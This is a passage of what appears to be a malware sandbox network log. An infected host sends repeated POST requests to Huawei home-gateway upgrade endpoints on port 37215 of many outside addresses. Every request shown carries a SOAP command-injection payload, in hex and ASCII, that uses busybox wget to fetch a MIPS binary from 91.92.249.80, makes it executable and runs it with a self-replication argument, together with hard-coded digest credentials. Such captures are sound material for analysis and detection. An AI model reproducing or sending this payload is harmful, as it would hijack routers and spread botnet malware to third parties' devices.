                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          646192.168.2.2337454157.123.25.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214823961 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          647192.168.2.235387670.149.159.23237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214838028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          648192.168.2.2348552157.107.27.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214843988 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          649192.168.2.2360802192.243.13.7137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214863062 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          650192.168.2.2340274151.84.153.1637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214864016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          651192.168.2.2335076219.182.228.22637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214864016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          652192.168.2.2358090197.164.176.19537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214875937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          653192.168.2.2343340157.67.210.5237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215028048 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          654192.168.2.2340918106.105.164.14537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215038061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          655192.168.2.2333826157.24.36.17637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215042114 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          656192.168.2.2344022157.129.113.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215051889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
